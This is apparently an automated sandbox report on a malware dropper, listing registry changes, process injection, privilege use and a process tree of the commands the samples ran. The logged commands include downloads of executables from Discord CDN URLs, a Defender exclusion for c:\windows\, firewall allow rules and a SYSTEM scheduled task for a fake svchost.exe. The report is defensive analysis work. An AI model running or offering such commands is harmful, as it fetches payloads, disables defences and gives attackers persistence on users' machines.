Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

4216 reg.exe
1016 reg.exe
Runs net.exe

pid	process
4216	reg.exe
1016	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	2272	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	2290	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup.exexeEw11gwst0fkXofh5d85wTx.exe

pid	process
3444	Setup.exe
3444	Setup.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe
1576	xeEw11gwst0fkXofh5d85wTx.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2540
Suspicious behavior: MapViewOfSection 11 IoCs

Processes:

VHmeMVDoBYofuqGBZLun8iZf.exeFZzLr2tjqX1Jir6RqytEFraR.exe814D.exeCalculator.exe46A4.exe

pid process

4144 VHmeMVDoBYofuqGBZLun8iZf.exe
4516 FZzLr2tjqX1Jir6RqytEFraR.exe
4420 814D.exe
5968 Calculator.exe
6016 46A4.exe
2540
2540
2540
2540
2540
2540

pid	process
2540

pid	process
4144	VHmeMVDoBYofuqGBZLun8iZf.exe
4516	FZzLr2tjqX1Jir6RqytEFraR.exe
4420	814D.exe
5968	Calculator.exe
6016	46A4.exe
2540
2540
2540
2540
2540
2540

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

dNR9GzJtquIpqHAAQDEQKiCc.exeDownFlSetup999.exeWerFault.execmd.exetaskkill.exe3fcHdKzTfqv3CT6edHB3pgwO.exel3igHLv4wrdFGbDIGj2a6ZlN.exek8k8wxXjfUpeIXlPi_wwZUXx.exeWerFault.exeWerFault.exepowershell.exe

description	pid	process
Token: SeCreateTokenPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeAssignPrimaryTokenPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeLockMemoryPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeIncreaseQuotaPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeMachineAccountPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeTcbPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeSecurityPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeTakeOwnershipPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeLoadDriverPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeSystemProfilePrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeSystemtimePrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeProfSingleProcessPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeIncBasePriorityPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeCreatePagefilePrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeCreatePermanentPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeBackupPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeRestorePrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeShutdownPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeDebugPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeAuditPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeSystemEnvironmentPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeChangeNotifyPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeRemoteShutdownPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeUndockPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeSyncAgentPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeEnableDelegationPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeManageVolumePrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeImpersonatePrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeCreateGlobalPrivilege	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: 31	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: 32	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: 33	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: 34	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: 35	1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
Token: SeDebugPrivilege	3604	DownFlSetup999.exe
Token: SeRestorePrivilege	4260	WerFault.exe
Token: SeBackupPrivilege	4260	WerFault.exe
Token: SeDebugPrivilege	4260	WerFault.exe
Token: SeDebugPrivilege	4636	cmd.exe
Token: SeDebugPrivilege	4624	taskkill.exe
Token: SeDebugPrivilege	3060	3fcHdKzTfqv3CT6edHB3pgwO.exe
Token: SeDebugPrivilege	1664	l3igHLv4wrdFGbDIGj2a6ZlN.exe
Token: SeDebugPrivilege	2000	k8k8wxXjfUpeIXlPi_wwZUXx.exe
Token: SeDebugPrivilege	5028	WerFault.exe
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeShutdownPrivilege	2540
Token: SeCreatePagefilePrivilege	2540
Token: SeDebugPrivilege	4108	WerFault.exe
Token: SeDebugPrivilege	4992	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

Calculator.exe

pid process

2540
2540
5496 Calculator.exe
2540
2540

pid	process
2540
2540
5496	Calculator.exe
2540
2540

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exeov3fHpSzG9oFx6cdzkERxS7K.exeAbR7TZXbBVNpeCrmegTpEi9c.exe8FsmloAVEPbzDjS_YK8iQVCC.exemshta.exeVHmeMVDoBYofuqGBZLun8iZf.exe

description	pid	process	target process
PID 3444 wrote to memory of 1576	3444	Setup.exe	xeEw11gwst0fkXofh5d85wTx.exe
PID 3444 wrote to memory of 1576	3444	Setup.exe	xeEw11gwst0fkXofh5d85wTx.exe
PID 3444 wrote to memory of 372	3444	Setup.exe	ov3fHpSzG9oFx6cdzkERxS7K.exe
PID 3444 wrote to memory of 372	3444	Setup.exe	ov3fHpSzG9oFx6cdzkERxS7K.exe
PID 3444 wrote to memory of 1268	3444	Setup.exe	LrPNo0ksV0sD0bBgiJZ3c3DL.exe
PID 3444 wrote to memory of 1268	3444	Setup.exe	LrPNo0ksV0sD0bBgiJZ3c3DL.exe
PID 3444 wrote to memory of 1268	3444	Setup.exe	LrPNo0ksV0sD0bBgiJZ3c3DL.exe
PID 3444 wrote to memory of 1428	3444	Setup.exe	7wTOP5xOsIHTorBSiqyxCKfI.exe
PID 3444 wrote to memory of 1428	3444	Setup.exe	7wTOP5xOsIHTorBSiqyxCKfI.exe
PID 3444 wrote to memory of 1428	3444	Setup.exe	7wTOP5xOsIHTorBSiqyxCKfI.exe
PID 3444 wrote to memory of 1608	3444	Setup.exe	VHmeMVDoBYofuqGBZLun8iZf.exe
PID 3444 wrote to memory of 1608	3444	Setup.exe	VHmeMVDoBYofuqGBZLun8iZf.exe
PID 3444 wrote to memory of 1608	3444	Setup.exe	VHmeMVDoBYofuqGBZLun8iZf.exe
PID 3444 wrote to memory of 1996	3444	Setup.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
PID 3444 wrote to memory of 1996	3444	Setup.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
PID 3444 wrote to memory of 1996	3444	Setup.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
PID 3444 wrote to memory of 1664	3444	Setup.exe	l3igHLv4wrdFGbDIGj2a6ZlN.exe
PID 3444 wrote to memory of 1664	3444	Setup.exe	l3igHLv4wrdFGbDIGj2a6ZlN.exe
PID 3444 wrote to memory of 1664	3444	Setup.exe	l3igHLv4wrdFGbDIGj2a6ZlN.exe
PID 3444 wrote to memory of 1808	3444	Setup.exe	hnIgIshcqBcfNW7qZq6J9Ibf.exe
PID 3444 wrote to memory of 1808	3444	Setup.exe	hnIgIshcqBcfNW7qZq6J9Ibf.exe
PID 3444 wrote to memory of 1808	3444	Setup.exe	hnIgIshcqBcfNW7qZq6J9Ibf.exe
PID 3444 wrote to memory of 1764	3444	Setup.exe	dNR9GzJtquIpqHAAQDEQKiCc.exe
PID 3444 wrote to memory of 1764	3444	Setup.exe	dNR9GzJtquIpqHAAQDEQKiCc.exe
PID 3444 wrote to memory of 1764	3444	Setup.exe	dNR9GzJtquIpqHAAQDEQKiCc.exe
PID 3444 wrote to memory of 1868	3444	Setup.exe	UNn8rF6JNcKGgeWhrAoHnhsK.exe
PID 3444 wrote to memory of 1868	3444	Setup.exe	UNn8rF6JNcKGgeWhrAoHnhsK.exe
PID 3444 wrote to memory of 2000	3444	Setup.exe	k8k8wxXjfUpeIXlPi_wwZUXx.exe
PID 3444 wrote to memory of 2000	3444	Setup.exe	k8k8wxXjfUpeIXlPi_wwZUXx.exe
PID 3444 wrote to memory of 2000	3444	Setup.exe	k8k8wxXjfUpeIXlPi_wwZUXx.exe
PID 3444 wrote to memory of 3260	3444	Setup.exe	ZYTTZvTjfNQKR2odpduE7e6V.exe
PID 3444 wrote to memory of 3260	3444	Setup.exe	ZYTTZvTjfNQKR2odpduE7e6V.exe
PID 3444 wrote to memory of 3260	3444	Setup.exe	ZYTTZvTjfNQKR2odpduE7e6V.exe
PID 3444 wrote to memory of 1876	3444	Setup.exe	AbR7TZXbBVNpeCrmegTpEi9c.exe
PID 3444 wrote to memory of 1876	3444	Setup.exe	AbR7TZXbBVNpeCrmegTpEi9c.exe
PID 3444 wrote to memory of 1876	3444	Setup.exe	AbR7TZXbBVNpeCrmegTpEi9c.exe
PID 3444 wrote to memory of 3060	3444	Setup.exe	3fcHdKzTfqv3CT6edHB3pgwO.exe
PID 3444 wrote to memory of 3060	3444	Setup.exe	3fcHdKzTfqv3CT6edHB3pgwO.exe
PID 3444 wrote to memory of 3060	3444	Setup.exe	3fcHdKzTfqv3CT6edHB3pgwO.exe
PID 3444 wrote to memory of 2316	3444	Setup.exe	EFJdNYHjJ49sjLJwK4BnTbAE.exe
PID 3444 wrote to memory of 2316	3444	Setup.exe	EFJdNYHjJ49sjLJwK4BnTbAE.exe
PID 3444 wrote to memory of 2316	3444	Setup.exe	EFJdNYHjJ49sjLJwK4BnTbAE.exe
PID 372 wrote to memory of 668	372	ov3fHpSzG9oFx6cdzkERxS7K.exe	cmd.exe
PID 372 wrote to memory of 668	372	ov3fHpSzG9oFx6cdzkERxS7K.exe	cmd.exe
PID 3444 wrote to memory of 864	3444	Setup.exe	8FsmloAVEPbzDjS_YK8iQVCC.exe
PID 3444 wrote to memory of 864	3444	Setup.exe	8FsmloAVEPbzDjS_YK8iQVCC.exe
PID 3444 wrote to memory of 864	3444	Setup.exe	8FsmloAVEPbzDjS_YK8iQVCC.exe
PID 1876 wrote to memory of 2188	1876	AbR7TZXbBVNpeCrmegTpEi9c.exe	cutm3.exe
PID 1876 wrote to memory of 2188	1876	AbR7TZXbBVNpeCrmegTpEi9c.exe	cutm3.exe
PID 1876 wrote to memory of 3604	1876	AbR7TZXbBVNpeCrmegTpEi9c.exe	DownFlSetup999.exe
PID 1876 wrote to memory of 3604	1876	AbR7TZXbBVNpeCrmegTpEi9c.exe	DownFlSetup999.exe
PID 1876 wrote to memory of 2244	1876	AbR7TZXbBVNpeCrmegTpEi9c.exe	inst3.exe
PID 1876 wrote to memory of 2244	1876	AbR7TZXbBVNpeCrmegTpEi9c.exe	inst3.exe
PID 1876 wrote to memory of 2244	1876	AbR7TZXbBVNpeCrmegTpEi9c.exe	inst3.exe
PID 864 wrote to memory of 2756	864	8FsmloAVEPbzDjS_YK8iQVCC.exe	mshta.exe
PID 864 wrote to memory of 2756	864	8FsmloAVEPbzDjS_YK8iQVCC.exe	mshta.exe
PID 864 wrote to memory of 2756	864	8FsmloAVEPbzDjS_YK8iQVCC.exe	mshta.exe
PID 2756 wrote to memory of 2056	2756	mshta.exe	cmd.exe
PID 2756 wrote to memory of 2056	2756	mshta.exe	cmd.exe
PID 2756 wrote to memory of 2056	2756	mshta.exe	cmd.exe
PID 1608 wrote to memory of 4144	1608	VHmeMVDoBYofuqGBZLun8iZf.exe	VHmeMVDoBYofuqGBZLun8iZf.exe
PID 1608 wrote to memory of 4144	1608	VHmeMVDoBYofuqGBZLun8iZf.exe	VHmeMVDoBYofuqGBZLun8iZf.exe
PID 1608 wrote to memory of 4144	1608	VHmeMVDoBYofuqGBZLun8iZf.exe	VHmeMVDoBYofuqGBZLun8iZf.exe
PID 1608 wrote to memory of 4144	1608	VHmeMVDoBYofuqGBZLun8iZf.exe	VHmeMVDoBYofuqGBZLun8iZf.exe

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3444

C:\Users\Admin\Pictures\Adobe Films\xeEw11gwst0fkXofh5d85wTx.exe
"C:\Users\Admin\Pictures\Adobe Films\xeEw11gwst0fkXofh5d85wTx.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1576

C:\Users\Admin\Pictures\Adobe Films\ov3fHpSzG9oFx6cdzkERxS7K.exe
"C:\Users\Admin\Pictures\Adobe Films\ov3fHpSzG9oFx6cdzkERxS7K.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:372

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\4758.bat "C:\Users\Admin\Pictures\Adobe Films\ov3fHpSzG9oFx6cdzkERxS7K.exe""
3⤵
PID:668

C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
4⤵
- Executes dropped EXE
PID:4376

C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899922141728886806/899922156077596692/11.exe" "11.exe" "" "" "" "" "" ""
4⤵
- Executes dropped EXE
PID:3552

C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899922141728886806/899922177439191050/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
4⤵
- Executes dropped EXE
PID:3088

C:\Users\Admin\AppData\Local\Temp\10841\11.exe
11.exe
4⤵
- Executes dropped EXE
PID:4224

C:\Users\Admin\AppData\Local\Temp\10841\Transmissibility.exe
Transmissibility.exe
4⤵
PID:4536

C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe "" "" "" "" "" "" "" "" ""
4⤵
PID:3328

C:\Users\Admin\Pictures\Adobe Films\EFJdNYHjJ49sjLJwK4BnTbAE.exe
"C:\Users\Admin\Pictures\Adobe Films\EFJdNYHjJ49sjLJwK4BnTbAE.exe"
2⤵
- Executes dropped EXE
PID:2316

C:\Users\Admin\Pictures\Adobe Films\3fcHdKzTfqv3CT6edHB3pgwO.exe
"C:\Users\Admin\Pictures\Adobe Films\3fcHdKzTfqv3CT6edHB3pgwO.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Users\Admin\Pictures\Adobe Films\ZYTTZvTjfNQKR2odpduE7e6V.exe
"C:\Users\Admin\Pictures\Adobe Films\ZYTTZvTjfNQKR2odpduE7e6V.exe"
2⤵
- Executes dropped EXE
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 968
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1680

C:\Users\Admin\Pictures\Adobe Films\AbR7TZXbBVNpeCrmegTpEi9c.exe
"C:\Users\Admin\Pictures\Adobe Films\AbR7TZXbBVNpeCrmegTpEi9c.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1876

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
3⤵
- Executes dropped EXE
PID:2188

C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3604

C:\Program Files (x86)\Company\NewProduct\inst3.exe
"C:\Program Files (x86)\Company\NewProduct\inst3.exe"
3⤵
- Executes dropped EXE
PID:2244

C:\Users\Admin\Pictures\Adobe Films\k8k8wxXjfUpeIXlPi_wwZUXx.exe
"C:\Users\Admin\Pictures\Adobe Films\k8k8wxXjfUpeIXlPi_wwZUXx.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Users\Admin\Pictures\Adobe Films\UNn8rF6JNcKGgeWhrAoHnhsK.exe
"C:\Users\Admin\Pictures\Adobe Films\UNn8rF6JNcKGgeWhrAoHnhsK.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:1868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:4328

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:4296

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
3⤵
- Creates scheduled task(s)
PID:2628

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:3068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
4⤵
- Blocklisted process makes network request
PID:1764

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:4628

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:4484

C:\Users\Admin\Pictures\Adobe Films\dNR9GzJtquIpqHAAQDEQKiCc.exe
"C:\Users\Admin\Pictures\Adobe Films\dNR9GzJtquIpqHAAQDEQKiCc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:5048

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:3744

C:\Users\Admin\Pictures\Adobe Films\hnIgIshcqBcfNW7qZq6J9Ibf.exe
"C:\Users\Admin\Pictures\Adobe Films\hnIgIshcqBcfNW7qZq6J9Ibf.exe"
2⤵
- Executes dropped EXE
PID:1808

C:\Users\Admin\Pictures\Adobe Films\P6IM15FYTnFWYGYBlTaNAQNV.exe
"C:\Users\Admin\Pictures\Adobe Films\P6IM15FYTnFWYGYBlTaNAQNV.exe"
2⤵
- Executes dropped EXE
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 660
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 676
3⤵
- Program crash
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 696
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 732
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 848
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4340

C:\Users\Admin\Pictures\Adobe Films\l3igHLv4wrdFGbDIGj2a6ZlN.exe
"C:\Users\Admin\Pictures\Adobe Films\l3igHLv4wrdFGbDIGj2a6ZlN.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Users\Admin\Pictures\Adobe Films\VHmeMVDoBYofuqGBZLun8iZf.exe
"C:\Users\Admin\Pictures\Adobe Films\VHmeMVDoBYofuqGBZLun8iZf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1608

C:\Users\Admin\Pictures\Adobe Films\VHmeMVDoBYofuqGBZLun8iZf.exe
"C:\Users\Admin\Pictures\Adobe Films\VHmeMVDoBYofuqGBZLun8iZf.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4144

C:\Users\Admin\Pictures\Adobe Films\7wTOP5xOsIHTorBSiqyxCKfI.exe
"C:\Users\Admin\Pictures\Adobe Films\7wTOP5xOsIHTorBSiqyxCKfI.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 7wTOP5xOsIHTorBSiqyxCKfI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\7wTOP5xOsIHTorBSiqyxCKfI.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:1888

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 7wTOP5xOsIHTorBSiqyxCKfI.exe /f
4⤵
- Kills process with taskkill
PID:1208

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:4020

C:\Users\Admin\Pictures\Adobe Films\LrPNo0ksV0sD0bBgiJZ3c3DL.exe
"C:\Users\Admin\Pictures\Adobe Films\LrPNo0ksV0sD0bBgiJZ3c3DL.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1268

C:\Users\Admin\Documents\pyflG5FfHzPj8pAPJ5WotMgv.exe
"C:\Users\Admin\Documents\pyflG5FfHzPj8pAPJ5WotMgv.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4220

C:\Users\Admin\Pictures\Adobe Films\HIJpnBDWwQL8HQX6heuOz6pE.exe
"C:\Users\Admin\Pictures\Adobe Films\HIJpnBDWwQL8HQX6heuOz6pE.exe"
4⤵
- Executes dropped EXE
PID:4344

C:\Users\Admin\Pictures\Adobe Films\V58wsCmspK2T1T22TACWZJED.exe
"C:\Users\Admin\Pictures\Adobe Films\V58wsCmspK2T1T22TACWZJED.exe" /mixtwo
4⤵
- Executes dropped EXE
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 828
5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:2992

C:\Users\Admin\Pictures\Adobe Films\FZzLr2tjqX1Jir6RqytEFraR.exe
